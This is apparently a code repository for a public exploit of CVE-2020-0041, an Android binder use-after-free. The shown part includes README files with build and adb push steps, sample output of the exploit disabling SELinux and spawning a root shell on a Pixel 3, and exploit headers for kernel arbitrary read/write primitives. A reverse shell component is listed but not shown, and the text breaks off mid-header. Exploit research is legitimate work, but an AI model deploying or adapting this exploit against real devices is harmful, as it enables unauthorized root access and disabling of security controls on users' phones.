├── README.md ├── lpe ├── Android.mk ├── Application.mk ├── Makefile ├── README.md ├── include │ ├── binder.h │ ├── binder_lookup.h │ ├── endpoint.h │ ├── exploit.h │ ├── handle.h │ ├── helpers.h │ ├── log.h │ ├── node.h │ ├── pending_node.h │ ├── realloc.h │ └── uapi_binder.h └── src │ ├── binder.c │ ├── binder_lookup.c │ ├── endpoint.c │ ├── exploit.c │ ├── helpers.c │ ├── log.c │ ├── node.c │ ├── pending_node.c │ └── realloc.c └── sandbox ├── README.md ├── index.html ├── main.diff ├── reverse_shell ├── Android.mk ├── Application.mk ├── Makefile └── src │ └── reverse_shell.c ├── serve.py └── v8.diff /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-0041 2 | 3 | This repository contains code for exploiting CVE-2020-0041, a bug we reported to Google in Decmeber 2019 and was fixed in the Android Security Bulletin from March 2020. 4 | 5 | You can find the sandbox escape exploit in [sandbox/](sandbox/). The analysis of the bug and exploitation approach can be found at https://labs.bluefrostsecurity.de/blog/2020/03/31/cve-2020-0041-part-1-sandbox-escape/ . 6 | 7 | Similarly, you can find the privilege escalation exploit in [lpe/](lpe/). The exploitation approach for this part can be found at https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/ . 8 | -------------------------------------------------------------------------------- /lpe/Android.mk: -------------------------------------------------------------------------------- 1 | LOCAL_PATH := $(call my-dir) 2 | include $(CLEAR_VARS) 3 | LOCAL_MODULE := poc 4 | LOCAL_CFLAGS += -Iinclude -DBINDER_DEVICE="\"/dev/hwbinder\"" 5 | LOCAL_SRC_FILES := src/exploit.c src/endpoint.c src/pending_node.c src/binder.c src/log.c src/helpers.c src/binder_lookup.c src/realloc.c src/node.c 6 | 7 | include $(BUILD_EXECUTABLE) 8 | 9 | 10 | -------------------------------------------------------------------------------- /lpe/Application.mk: -------------------------------------------------------------------------------- 1 | APP_ABI := arm64-v8a 2 | APP_PLATFORM := android-24 3 | APP_BUILD_SCRIPT := Android.mk -------------------------------------------------------------------------------- /lpe/Makefile: -------------------------------------------------------------------------------- 1 | # Assume nkd-build is in the path 2 | NDK_BUILD := NDK_PROJECT_PATH=. ndk-build NDK_APPLICATION_MK=./Application.mk 3 | # Retrieve binary name from Android.mk 4 | BIN := $(shell cat Android.mk | grep LOCAL_MODULE | head -n1 | cut -d' ' -f3) 5 | 6 | BIN_PATH := libs/arm64-v8a/$(BIN) 7 | 8 | all: android 9 | 10 | $(BIN_PATH): 11 | $(NDK_BUILD) 12 | 13 | android: 14 | @echo "Building Android" 15 | $(NDK_BUILD) 16 | 17 | push: $(BIN_PATH) $(LOADER) 18 | adb push $(BIN_PATH) /data/local/tmp/$(notdir $(BIN_PATH)) 19 | 20 | shell: push 21 | adb shell /data/local/tmp/$(BIN) 22 | 23 | clean: 24 | $(NDK_BUILD) clean 25 | -adb shell rm /data/local/tmp/$(notdir $(BIN_PATH)) 26 | 27 | distclean: clean 28 | $(RM) -rf libs obj 29 | -------------------------------------------------------------------------------- /lpe/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2020-0041: privilege escalation exploit 2 | 3 | This folder contains the local privilege escalation exploit we wrote for CVE-2020-0041. 4 | The exploit is provided with hardcoded offsets for a Pixel 3 device running the February 5 | 2020 firmware (QQ1A.200205.002). The exploit needs to be adapted before being able to 6 | run it on other vulnerable devices or Pixel 3 devices with different firmware versions. 7 | 8 | The exploit disables SELinux and then launches a root shell. 9 | 10 | ## Testing the exploit 11 | 12 | The exploit can be built by simply running "make" with the Android NDK in the path. It can also 13 | be pushed to a phone attached with adb by doing "make all push" (warnings removed for brevity): 14 | 15 | ``` 16 | user@laptop:~/CVE-2020-0041/lpe$ make all push 17 | Building Android 18 | NDK_PROJECT_PATH=. ndk-build NDK_APPLICATION_MK=./Application.mk 19 | make[1]: Entering directory `/home/user/CVE-2020-0041/lpe' 20 | [arm64-v8a] Compile : poc <= exploit.c 21 | [arm64-v8a] Compile : poc <= endpoint.c 22 | [arm64-v8a] Compile : poc <= pending_node.c 23 | [arm64-v8a] Compile : poc <= binder.c 24 | [arm64-v8a] Compile : poc <= log.c 25 | [arm64-v8a] Compile : poc <= helpers.c 26 | [arm64-v8a] Compile : poc <= binder_lookup.c 27 | [arm64-v8a] Compile : poc <= realloc.c 28 | [arm64-v8a] Compile : poc <= node.c 29 | [arm64-v8a] Executable : poc 30 | [arm64-v8a] Install : poc => libs/arm64-v8a/poc 31 | make[1]: Leaving directory `/home/user/CVE-2020-0041/lpe' 32 | adb push libs/arm64-v8a/poc /data/local/tmp/poc 33 | libs/arm64-v8a/poc: 1 file pushed. 4.3 MB/s (39016 bytes in 0.009s) 34 | ``` 35 | 36 | Now just run /data/local/tmp/poc from an adb shell to see the exploit running: 37 | 38 | ``` 39 | blueline:/ $ /data/local/tmp/poc 40 | [+] Mapped 200000 41 | [+] selinux_enforcing before exploit: 1 42 | [+] pipe file: 0xffffffd9c67c7700 43 | [*] file epitem at ffffffda545d7d00 44 | [*] Reallocating content of 'write8_inode' with controlled data.[DONE] 45 | [+] Overwriting 0xffffffd9c67c7720 with 0xffffffda545d7d50...[DONE] 46 | [*] Write done, should have arbitrary read now. 47 | [+] file operations: ffffff97df1af650 48 | [+] kernel base: ffffff97dd280000 49 | [*] Reallocating content of 'write8_selinux' with controlled data.[DONE] 50 | [+] Overwriting 0xffffff97dfe24000 with 0x0...[DONE] 51 | [*] init_cred: ffffff97dfc300a0 52 | [+] memstart_addr: 0xffffffe700000000 53 | [+] First level entry: ceac5003 -> next table at ffffffd9ceac5000 54 | [+] Second level entry: f173c003 -> next table at ffffffd9f173c000 55 | [+] sysctl_table_root = ffffff97dfc5a3f8 56 | [*] Reallocating content of 'write8_sysctl' with controlled data.[DONE] 57 | [+] Overwriting 0xffffffda6da8d868 with 0xffffffda49ced000...[DONE] 58 | [+] Injected sysctl node! 59 | [*] Node write8_inode, pid 7058, kaddr ffffffda0723f900 60 | [*] Replaced sendmmsg dangling reference 61 | [*] Replaced sendmmsg dangling reference 62 | [*] Replaced sendmmsg dangling reference 63 | [*] Node write8_selinux, pid 6848, kaddr ffffffd9c9fa2400 64 | [*] Replaced sendmmsg dangling reference 65 | [*] Replaced sendmmsg dangling reference 66 | [*] Replaced sendmmsg dangling reference 67 | [*] Node write8_sysctl, pid 7110, kaddr ffffffda67e7d180 68 | [*] Replaced sendmmsg dangling reference 69 | [*] Replaced sendmmsg dangling reference 70 | [*] Replaced sendmmsg dangling reference 71 | [+] Cleaned up sendmsg threads 72 | [*] epitem.next = ffffffd9c67c7720 73 | [*] epitem.prev = ffffffd9c67c77d8 74 | ^[[*] Launching privileged shell 75 | root_by_cve-2020-0041:/ # id 76 | uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0 77 | root_by_cve-2020-0041:/ # getenforce 78 | Permissive 79 | root_by_cve-2020-0041:/ # 80 | ``` 81 | -------------------------------------------------------------------------------- /lpe/include/binder.h: -------------------------------------------------------------------------------- 1 | /* Copyright 2008 The Android Open Source Project 2 | */ 3 | 4 | #ifndef _BINDER_H_ 5 | #define _BINDER_H_ 6 | 7 | #include 8 | #include 9 | #include 10 | #include "uapi_binder.h" 11 | 12 | struct binder_state 13 | { 14 | int fd; 15 | void *mapped; 16 | size_t mapsize; 17 | }; 18 | 19 | struct binder_io 20 | { 21 | char *data; /* pointer to read/write from */ 22 | binder_size_t *offs; /* array of offsets */ 23 | size_t data_avail; /* bytes available in data buffer */ 24 | size_t offs_avail; /* entries available in offsets array */ 25 | 26 | char *data0; /* start of data buffer */ 27 | binder_size_t *offs0; /* start of offsets buffer */ 28 | uint32_t flags; 29 | uint32_t unused; 30 | }; 31 | 32 | struct binder_death { 33 | void (*func)(struct binder_state *bs, void *ptr); 34 | void *ptr; 35 | }; 36 | 37 | /* the one magic handle */ 38 | #define BINDER_SERVICE_MANAGER 0U 39 | 40 | #define SVC_MGR_NAME "android.os.IServiceManager" 41 | 42 | enum { 43 | /* Must match definitions in IBinder.h and IServiceManager.h */ 44 | PING_TRANSACTION = B_PACK_CHARS('_','P','N','G'), 45 | SVC_MGR_GET_SERVICE = 1, 46 | SVC_MGR_CHECK_SERVICE, 47 | SVC_MGR_ADD_SERVICE, 48 | SVC_MGR_LIST_SERVICES, 49 | SVC_MGR_GET_RANDOM, 50 | }; 51 | 52 | typedef int (*binder_handler)(struct binder_state *bs, 53 | struct binder_transaction_data *txn, 54 | struct binder_io *msg, 55 | struct binder_io *reply); 56 | 57 | struct binder_state *binder_open(const char* driver, size_t mapsize); 58 | void binder_close(struct binder_state *bs); 59 | 60 | /* initiate a blocking binder call 61 | * - returns zero on success 62 | */ 63 | int binder_call(struct binder_state *bs, 64 | struct binder_io *msg, struct binder_io *reply, 65 | uint32_t target, uint32_t code); 66 | 67 | int binder_call2(struct binder_state *bs, 68 | struct binder_io *msg, struct binder_io *reply, 69 | uint32_t target, uint32_t code, char *buffer); 70 | 71 | /* release any state associate with the binder_io 72 | * - call once any necessary data has been extracted from the 73 | * binder_io after binder_call() returns 74 | * - can safely be called even if binder_call() fails 75 | */ 76 | void binder_done(struct binder_state *bs, 77 | struct binder_io *msg, struct binder_io *reply); 78 | 79 | /* manipulate strong references */ 80 | void binder_acquire(struct binder_state *bs, uint32_t target); 81 | void binder_release(struct binder_state *bs, uint32_t target); 82 | 83 | void binder_link_to_death(struct binder_state *bs, uint32_t target, struct binder_death *death); 84 | 85 | void binder_loop(struct binder_state *bs, binder_handler func); 86 | 87 | int binder_become_context_manager(struct binder_state *bs); 88 | 89 | /* allocate a binder_io, providing a stack-allocated working 90 | * buffer, size of the working buffer, and how many object 91 | * offset entries to reserve from the buffer 92 | */ 93 | void bio_init(struct binder_io *bio, void *data, 94 | size_t maxdata, size_t maxobjects); 95 | 96 | void bio_put_obj(struct binder_io *bio, void *ptr); 97 | void bio_put_ref(struct binder_io *bio, uint32_t handle); 98 | void bio_put_fd(struct binder_io *bio, int fd); 99 | void *bio_put_ptr(struct binder_io *bio, void *buffer, uint32_t size, uint32_t *off); 100 | void bio_put_fd_array(struct binder_io *bio, uint64_t parent, uint64_t parent_offset, int num_fds); 101 | void bio_put_uint32(struct binder_io *bio, uint32_t n); 102 | void bio_put_string16(struct binder_io *bio, const uint16_t *str); 103 | void bio_put_string16_x(struct binder_io *bio, const char *_str); 104 | 105 | uint32_t bio_get_uint32(struct binder_io *bio); 106 | uint16_t *bio_get_string16(struct binder_io *bio, size_t *sz); 107 | uint32_t bio_get_ref(struct binder_io *bio); 108 | void *bio_alloc(struct binder_io *bio, size_t size); 109 | 110 | int binder_write(struct binder_state *bs, void *data, size_t len); 111 | int binder_read(int fd, void *buffer, size_t size); 112 | int binder_transaction(struct binder_state *bs, bool one_way, uint32_t handle, void *opaque, size_t opaque_size, void *offsets, size_t offsets_size); 113 | 114 | void binder_free_buffer(struct binder_state *bs, binder_uintptr_t buffer_to_free); 115 | void binder_free_buffers(struct binder_state *bs, binder_uintptr_t buffer_to_free); 116 | 117 | 118 | 119 | #endif 120 | -------------------------------------------------------------------------------- /lpe/include/binder_lookup.h: -------------------------------------------------------------------------------- 1 | #ifndef __BINDER_LOOKUP_H 2 | 3 | #define __BINDER_LOOKUP_H 4 | 5 | int publish_handle(struct binder_state *bs, uint64_t handle, char *name); 6 | uint32_t grab_handle(struct binder_state *bs, char *name); 7 | uint32_t grab_handle_and_buffer(struct binder_state *bs, char *name, uint64_t *buffer_end); 8 | void cleanup_lookup(struct binder_state *bs); 9 | int lookup_service(struct binder_state *bs, char *name); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /lpe/include/endpoint.h: -------------------------------------------------------------------------------- 1 | #ifndef ENDPOINT_H_ 2 | # define ENDPOINT_H_ 3 | #include 4 | 5 | struct endpoint_handle { 6 | struct endpoint_info *next; 7 | uint8_t *name; 8 | struct binder_state *bs; 9 | void *stack; 10 | pid_t pid; 11 | pthread_barrier_t barrier; 12 | int status; 13 | uint64_t client_handle; 14 | uint64_t reserved_buffer; 15 | jmp_buf env; 16 | }; 17 | 18 | 19 | 20 | typedef enum { 21 | GET_VMA_START = 0, 22 | EXCHANGE_HANDLES, 23 | ADD_PENDING_NODE, 24 | TERMINATE_PENDING_NODE, 25 | RESERVE_BUFFER, 26 | FREE_RESERVED_BUFFER, 27 | TRIGGER_DECREF, 28 | } endpoint_cmd_t; 29 | 30 | 31 | bool bootstrap_endpoint(const char *endpoint_name); 32 | bool terminate_endpoint(const char *endpoint_name); 33 | struct endpoint_handle *get_endpoints(); 34 | 35 | 36 | 37 | #endif /*! ENDPOINT_H_ */ 38 | -------------------------------------------------------------------------------- /lpe/include/exploit.h: -------------------------------------------------------------------------------- 1 | #ifndef EXPLOIT_H_ 2 | #define EXPLOIT_H_ 3 | 4 | #include "node.h" 5 | 6 | uint64_t setup_pending_nodes(struct binder_state *bs, uint64_t endpoint_handle, pthread_t *th, uint32_t n1, uint32_t n2); 7 | 8 | #endif /*! EXPLOIT_H_ */ 9 | -------------------------------------------------------------------------------- /lpe/include/handle.h: -------------------------------------------------------------------------------- 1 | #ifndef HANDLE_H_ 2 | #define HANDLE_H_ 3 | #include 4 | #include "binder.h" 5 | 6 | bool publish_handle(struct binder_state *bs, uint64_t handle, const char *srv_name); 7 | uint64_t grab_handle(struct binder_state *bs, const char *srv_name); 8 | 9 | 10 | #endif /*! HANDLE_H_ */ 11 | -------------------------------------------------------------------------------- /lpe/include/helpers.h: -------------------------------------------------------------------------------- 1 | #ifndef HELPERS_H_ 2 | #define HELPERS_H_ 3 | 4 | bool pin_cpu(int cpu); 5 | 6 | #endif /*! HELPERS_H_ */ 7 | -------------------------------------------------------------------------------- /lpe/include/log.h: -------------------------------------------------------------------------------- 1 | #ifndef __LOG_H_ 2 | #define __LOG_H_ 3 | 4 | #include 5 | 6 | #define ALOGE(...) printf(__VA_ARGS__) 7 | #define ALOGI(...) printf(__VA_ARGS__) 8 | ssize_t log_info(const char *format, ...); 9 | ssize_t log_err(const char *format, ...); 10 | #endif 11 | -------------------------------------------------------------------------------- /lpe/include/node.h: -------------------------------------------------------------------------------- 1 | #ifndef NODE_H_ 2 | #define NODE_H_ 3 | #include 4 | #include 5 | 6 | #include "binder.h" 7 | #include "pending_node.h" 8 | 9 | struct exp_node { 10 | struct binder_state *bs; 11 | uint64_t handle; 12 | const char *endpoint_name; 13 | uint8_t name[16]; 14 | uint64_t vma_start; 15 | bool second; 16 | pthread_t *th; 17 | int idx; 18 | int max; 19 | struct pending_node *pending_nodes; 20 | int num_pending; 21 | uint64_t addr; 22 | uint64_t kaddr; 23 | int target_fd; 24 | uint64_t file_addr; 25 | int ep_fd; 26 | pid_t tid; 27 | }; 28 | 29 | /* exp_node API. */ 30 | 31 | struct exp_node *node_new(const char *name); 32 | void node_free(struct exp_node *node); 33 | bool node_reset(struct exp_node *node); 34 | 35 | /* This are the kernel related operations. */ 36 | void node_kfree(struct exp_node *node); 37 | bool node_realloc_content(struct exp_node *node, void *data, size_t size); 38 | bool node_write8(struct exp_node *node, uint64_t what, uint64_t where); 39 | bool node_write_null(struct exp_node *node, uint64_t where); 40 | 41 | 42 | bool node_realloc(struct exp_node *node, void *content, size_t size); 43 | struct exp_node *node_create(uint8_t *endpoint_name, int target_fd); 44 | static struct exp_node *_node_create(uint8_t *endpoint_name, int target_fd); 45 | void node_destroy(struct exp_node *node); 46 | bool node_leak(struct exp_node *node, uint64_t *A, uint64_t *B); 47 | bool node_leak_addr_and_kbase(struct exp_node *node, uint64_t *text); 48 | #endif /*! NODE_H_ */ 49 | -------------------------------------------------------------------------------- /lpe/include/pending_node.h: -------------------------------------------------------------------------------- 1 | #ifndef PENDING_NODE_H_ 2 | #define PENDING_NODE_H_ 3 | 4 | typedef enum node_state 5 | { 6 | NODE_NOT_READY, 7 | NODE_FINISHED, 8 | NODE_READY, 9 | NODE_LEAKED, 10 | NODE_FREE, 11 | } node_state; 12 | 13 | typedef struct pending_node 14 | { 15 | node_state state; 16 | struct pending_node *next; 17 | struct binder_state *bs; 18 | pthread_barrier_t barrier; /* Barrier. */ 19 | pthread_barrier_t ready; 20 | pthread_barrier_t do_barrier; 21 | pthread_barrier_t done_barrier; 22 | uint64_t uaf_buffer; /* Address of binder buffer. */ 23 | pthread_t uaf_node_th; 24 | uint64_t uaf_node; 25 | uint64_t leaked_data[2]; 26 | 27 | } pending_node; 28 | 29 | 30 | void *pending_node_thread(void *args); 31 | pthread_t add_pending_node(struct binder_state *from, uint64_t pending_node); 32 | pthread_t pending_node_create(struct binder_state *bs, uint64_t node); 33 | 34 | #endif /*! PENDING_NODE_H_ */ 35 | -------------------------------------------------------------------------------- /lpe/include/realloc.h: -------------------------------------------------------------------------------- 1 | #ifndef REALLOC_H_ 2 | #define REALLOC_H_ 3 | 4 | #define NREALLOC 0x80 * 8 5 | #define BUFSZ 0x80 6 | 7 | void *realloc_thread(void *args); 8 | void spawn_realloc_threads(); 9 | void cleanup_realloc_threads(); 10 | void setup_realloc_buffer(void *content, size_t size); 11 | bool discard_realloc_thread(pid_t pid); 12 | 13 | 14 | #endif /*! REALLOC_H_ */ 15 | -------------------------------------------------------------------------------- /lpe/include/uapi_binder.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (C) 2008 Google, Inc. 3 | * 4 | * Based on, but no longer compatible with, the original 5 | * OpenBinder.org binder driver interface, which is: 6 | * 7 | * Copyright (c) 2005 Palmsource, Inc. 8 | * 9 | * This software is licensed under the terms of the GNU General Public 10 | * License version 2, as published by the Free Software Foundation, and 11 | * may be copied, distributed, and modified under those terms. 12 | * 13 | * This program is distributed in the hope that it will be useful, 14 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | * GNU General Public License for more details. 17 | * 18 | */ 19 | 20 | #ifndef _UAPI_LINUX_BINDER_H 21 | #define _UAPI_LINUX_BINDER_H 22 | 23 | #include 24 | #include 25 | #include 26 | 27 | #define B_PACK_CHARS(c1, c2, c3, c4) \ 28 | ((((c1)<<24)) | (((c2)<<16)) | (((c3)<<8)) | (c4)) 29 | #define B_TYPE_LARGE 0x85 30 | 31 | enum { 32 | BINDER_TYPE_BINDER = B_PACK_CHARS('s', 'b', '*', B_TYPE_LARGE), 33 | BINDER_TYPE_WEAK_BINDER = B_PACK_CHARS('w', 'b', '*', B_TYPE_LARGE), 34 | BINDER_TYPE_HANDLE = B_PACK_CHARS('s', 'h', '*', B_TYPE_LARGE), 35 | BINDER_TYPE_WEAK_HANDLE = B_PACK_CHARS('w', 'h', '*', B_TYPE_LARGE), 36 | BINDER_TYPE_FD = B_PACK_CHARS('f', 'd', '*', B_TYPE_LARGE), 37 | BINDER_TYPE_FDA = B_PACK_CHARS('f', 'd', 'a', B_TYPE_LARGE), 38 | BINDER_TYPE_PTR = B_PACK_CHARS('p', 't', '*', B_TYPE_LARGE), 39 | }; 40 | 41 | /** 42 | * enum flat_binder_object_shifts: shift values for flat_binder_object_flags 43 | * @FLAT_BINDER_FLAG_SCHED_POLICY_SHIFT: shift for getting scheduler policy. 44 | * 45 | */ 46 | enum flat_binder_object_shifts { 47 | FLAT_BINDER_FLAG_SCHED_POLICY_SHIFT = 9, 48 | }; 49 | 50 | /** 51 | * enum flat_binder_object_flags - flags for use in flat_binder_object.flags 52 | */ 53 | enum flat_binder_object_flags { 54 | /** 55 | * @FLAT_BINDER_FLAG_PRIORITY_MASK: bit-mask for min scheduler priority 56 | * 57 | * These bits can be used to set the minimum scheduler priority 58 | * at which transactions into this node should run. Valid values 59 | * in these bits depend on the scheduler policy encoded in 60 | * @FLAT_BINDER_FLAG_SCHED_POLICY_MASK. 61 | * 62 | * For SCHED_NORMAL/SCHED_BATCH, the valid range is between [-20..19] 63 | * For SCHED_FIFO/SCHED_RR, the value can run between [1..99] 64 | */ 65 | FLAT_BINDER_FLAG_PRIORITY_MASK = 0xff, 66 | /** 67 | * @FLAT_BINDER_FLAG_ACCEPTS_FDS: whether the node accepts fds. 68 | */ 69 | FLAT_BINDER_FLAG_ACCEPTS_FDS = 0x100, 70 | /** 71 | * @FLAT_BINDER_FLAG_SCHED_POLICY_MASK: bit-mask for scheduling policy 72 | * 73 | * These two bits can be used to set the min scheduling policy at which 74 | * transactions on this node should run. These match the UAPI 75 | * scheduler policy values, eg: 76 | * 00b: SCHED_NORMAL 77 | * 01b: SCHED_FIFO 78 | * 10b: SCHED_RR 79 | * 11b: SCHED_BATCH 80 | */ 81 | FLAT_BINDER_FLAG_SCHED_POLICY_MASK = 82 | 3U << FLAT_BINDER_FLAG_SCHED_POLICY_SHIFT, 83 | 84 | /** 85 | * @FLAT_BINDER_FLAG_INHERIT_RT: whether the node inherits RT policy 86 | * 87 | * Only when set, calls into this node will inherit a real-time 88 | * scheduling policy from the caller (for synchronous transactions). 89 | */ 90 | FLAT_BINDER_FLAG_INHERIT_RT = 0x800, 91 | }; 92 | 93 | #ifdef BINDER_IPC_32BIT 94 | typedef __u32 binder_size_t; 95 | typedef __u32 binder_uintptr_t; 96 | #else 97 | typedef __u64 binder_size_t; 98 | typedef __u64 binder_uintptr_t; 99 | #endif 100 | 101 | /** 102 | * struct binder_object_header - header shared by all binder metadata objects. 103 | * @type: type of the object 104 | */ 105 | struct binder_object_header { 106 | __u32 type; 107 | }; 108 | 109 | /* 110 | * This is the flattened representation of a Binder object for transfer 111 | * between processes. The 'offsets' supplied as part of a binder transaction 112 | * contains offsets into the data where these structures occur. The Binder 113 | * driver takes care of re-writing the structure type and data as it moves 114 | * between processes. 115 | */ 116 | struct flat_binder_object { 117 | struct binder_object_header hdr; 118 | __u32 flags; 119 | 120 | /* 8 bytes of data. */ 121 | union { 122 | binder_uintptr_t binder; /* local object */ 123 | __u32 handle; /* remote object */ 124 | }; 125 | 126 | /* extra data associated with local object */ 127 | binder_uintptr_t cookie; 128 | }; 129 | 130 | /** 131 | * struct binder_fd_object - describes a filedescriptor to be fixed up. 132 | * @hdr: common header structure 133 | * @pad_flags: padding to remain compatible with old userspace code 134 | * @pad_binder: padding to remain compatible with old userspace code 135 | * @fd: file descriptor 136 | * @cookie: opaque data, used by user-space 137 | */ 138 | struct binder_fd_object { 139 | struct binder_object_header hdr; 140 | __u32 pad_flags; 141 | union { 142 | binder_uintptr_t pad_binder; 143 | __u32 fd; 144 | }; 145 | 146 | binder_uintptr_t cookie; 147 | }; 148 | 149 | /* struct binder_buffer_object - object describing a userspace buffer 150 | * @hdr: common header structure 151 | * @flags: one or more BINDER_BUFFER_* flags 152 | * @buffer: address of the buffer 153 | * @length: length of the buffer 154 | * @parent: index in offset array pointing to parent buffer 155 | * @parent_offset: offset in @parent pointing to this buffer 156 | * 157 | * A binder_buffer object represents an object that the 158 | * binder kernel driver can copy verbatim to the target 159 | * address space. A buffer itself may be pointed to from 160 | * within another buffer, meaning that the pointer inside 161 | * that other buffer needs to be fixed up as well. This 162 | * can be done by setting the BINDER_BUFFER_FLAG_HAS_PARENT 163 | * flag in @flags, by setting @parent buffer to the index 164 | * in the offset array pointing to the parent binder_buffer_object, 165 | * and by setting @parent_offset to the offset in the parent buffer 166 | * at which the pointer to this buffer is located. 167 | */ 168 | struct binder_buffer_object { 169 | struct binder_object_header hdr; 170 | __u32 flags; 171 | binder_uintptr_t buffer; 172 | binder_size_t length; 173 | binder_size_t parent; 174 | binder_size_t parent_offset; 175 | }; 176 | 177 | enum { 178 | BINDER_BUFFER_FLAG_HAS_PARENT = 0x01, 179 | }; 180 | 181 | /* struct binder_fd_array_object - object describing an array of fds in a buffer 182 | * @hdr: common header structure 183 | * @pad: padding to ensure correct alignment 184 | * @num_fds: number of file descriptors in the buffer 185 | * @parent: index in offset array to buffer holding the fd array 186 | * @parent_offset: start offset of fd array in the buffer 187 | * 188 | * A binder_fd_array object represents an array of file 189 | * descriptors embedded in a binder_buffer_object. It is 190 | * different from a regular binder_buffer_object because it 191 | * describes a list of file descriptors to fix up, not an opaque 192 | * blob of memory, and hence the kernel needs to treat it differently. 193 | * 194 | * An example of how this would be used is with Android's 195 | * native_handle_t object, which is a struct with a list of integers 196 | * and a list of file descriptors. The native_handle_t struct itself 197 | * will be represented by a struct binder_buffer_objct, whereas the 198 | * embedded list of file descriptors is represented by a 199 | * struct binder_fd_array_object with that binder_buffer_object as 200 | * a parent. 201 | */ 202 | struct binder_fd_array_object { 203 | struct binder_object_header hdr; 204 | __u32 pad; 205 | binder_size_t num_fds; 206 | binder_size_t parent; 207 | binder_size_t parent_offset; 208 | }; 209 | 210 | /* 211 | * On 64-bit platforms where user code may run in 32-bits the driver must 212 | * translate the buffer (and local binder) addresses appropriately. 213 | */ 214 | 215 | struct binder_write_read { 216 | binder_size_t write_size; /* bytes to write */ 217 | binder_size_t write_consumed; /* bytes consumed by driver */ 218 | binder_uintptr_t write_buffer; 219 | binder_size_t read_size; /* bytes to read */ 220 | binder_size_t read_consumed; /* bytes consumed by driver */ 221 | binder_uintptr_t read_buffer; 222 | }; 223 | 224 | /* Use with BINDER_VERSION, driver fills in fields. */ 225 | struct binder_version { 226 | /* driver protocol version -- increment with incompatible change */ 227 | __s32 protocol_version; 228 | }; 229 | 230 | /* This is the current protocol version. */ 231 | #ifdef BINDER_IPC_32BIT 232 | #define BINDER_CURRENT_PROTOCOL_VERSION 7 233 | #else 234 | #define BINDER_CURRENT_PROTOCOL_VERSION 8 235 | #endif 236 | 237 | /* 238 | * Use with BINDER_GET_NODE_DEBUG_INFO, driver reads ptr, writes to all fields. 239 | * Set ptr to NULL for the first call to get the info for the first node, and 240 | * then repeat the call passing the previously returned value to get the next 241 | * nodes. ptr will be 0 when there are no more nodes. 242 | */ 243 | struct binder_node_debug_info { 244 | binder_uintptr_t ptr; 245 | binder_uintptr_t cookie; 246 | __u32 has_strong_ref; 247 | __u32 has_weak_ref; 248 | }; 249 | 250 | #define BINDER_WRITE_READ _IOWR('b', 1, struct binder_write_read) 251 | #define BINDER_SET_IDLE_TIMEOUT _IOW('b', 3, __s64) 252 | #define BINDER_SET_MAX_THREADS _IOW('b', 5, __u32) 253 | #define BINDER_SET_IDLE_PRIORITY _IOW('b', 6, __s32) 254 | #define BINDER_SET_CONTEXT_MGR _IOW('b', 7, __s32) 255 | #define BINDER_THREAD_EXIT _IOW('b', 8, __s32) 256 | #define BINDER_VERSION _IOWR('b', 9, struct binder_version) 257 | #define BINDER_GET_NODE_DEBUG_INFO _IOWR('b', 11, struct binder_node_debug_info) 258 | 259 | /* 260 | * NOTE: Two special error codes you should check for when calling 261 | * in to the driver are: 262 | * 263 | * EINTR -- The operation has been interupted. This should be 264 | * handled by retrying the ioctl() until a different error code 265 | * is returned. 266 | * 267 | * ECONNREFUSED -- The driver is no longer accepting operations 268 | * from your process. That is, the process is being destroyed. 269 | * You should handle this by exiting from your process. Note 270 | * that once this error code is returned, all further calls to 271 | * the driver from any thread will return this same code. 272 | */ 273 | 274 | enum transaction_flags { 275 | TF_ONE_WAY = 0x01, /* this is a one-way call: async, no return */ 276 | TF_ROOT_OBJECT = 0x04, /* contents are the component's root object */ 277 | TF_STATUS_CODE = 0x08, /* contents are a 32-bit status code */ 278 | TF_ACCEPT_FDS = 0x10, /* allow replies with file descriptors */ 279 | }; 280 | 281 | struct binder_transaction_data { 282 | /* The first two are only used for bcTRANSACTION and brTRANSACTION, 283 | * identifying the target and contents of the transaction. 284 | */ 285 | union { 286 | /* target descriptor of command transaction */ 287 | __u32 handle; 288 | /* target descriptor of return transaction */ 289 | binder_uintptr_t ptr; 290 | } target; 291 | binder_uintptr_t cookie; /* target object cookie */ 292 | __u32 code; /* transaction command */ 293 | 294 | /* General information about the transaction. */ 295 | __u32 flags; 296 | pid_t sender_pid; 297 | uid_t sender_euid; 298 | binder_size_t data_size; /* number of bytes of data */ 299 | binder_size_t offsets_size; /* number of bytes of offsets */ 300 | 301 | /* If this transaction is inline, the data immediately 302 | * follows here; otherwise, it ends with a pointer to 303 | * the data buffer. 304 | */ 305 | union { 306 | struct { 307 | /* transaction data */ 308 | binder_uintptr_t buffer; 309 | /* offsets from buffer to flat_binder_object structs */ 310 | binder_uintptr_t offsets; 311 | } ptr; 312 | __u8 buf[8]; 313 | } data; 314 | }; 315 | 316 | struct binder_transaction_data_sg { 317 | struct binder_transaction_data transaction_data; 318 | binder_size_t buffers_size; 319 | }; 320 | 321 | struct binder_ptr_cookie { 322 | binder_uintptr_t ptr; 323 | binder_uintptr_t cookie; 324 | }; 325 | 326 | struct binder_handle_cookie { 327 | __u32 handle; 328 | binder_uintptr_t cookie; 329 | } __packed; 330 | 331 | struct binder_pri_desc { 332 | __s32 priority; 333 | __u32 desc; 334 | }; 335 | 336 | struct binder_pri_ptr_cookie { 337 | __s32 priority; 338 | binder_uintptr_t ptr; 339 | binder_uintptr_t cookie; 340 | }; 341 | 342 | enum binder_driver_return_protocol { 343 | BR_ERROR = _IOR('r', 0, __s32), 344 | /* 345 | * int: error code 346 | */ 347 | 348 | BR_OK = _IO('r', 1), 349 | /* No parameters! */ 350 | 351 | BR_TRANSACTION = _IOR('r', 2, struct binder_transaction_data), 352 | BR_REPLY = _IOR('r', 3, struct binder_transaction_data), 353 | /* 354 | * binder_transaction_data: the received command. 355 | */ 356 | 357 | BR_ACQUIRE_RESULT = _IOR('r', 4, __s32), 358 | /* 359 | * not currently supported 360 | * int: 0 if the last bcATTEMPT_ACQUIRE was not successful. 361 | * Else the remote object has acquired a primary reference. 362 | */ 363 | 364 | BR_DEAD_REPLY = _IO('r', 5), 365 | /* 366 | * The target of the last transaction (either a bcTRANSACTION or 367 | * a bcATTEMPT_ACQUIRE) is no longer with us. No parameters. 368 | */ 369 | 370 | BR_TRANSACTION_COMPLETE = 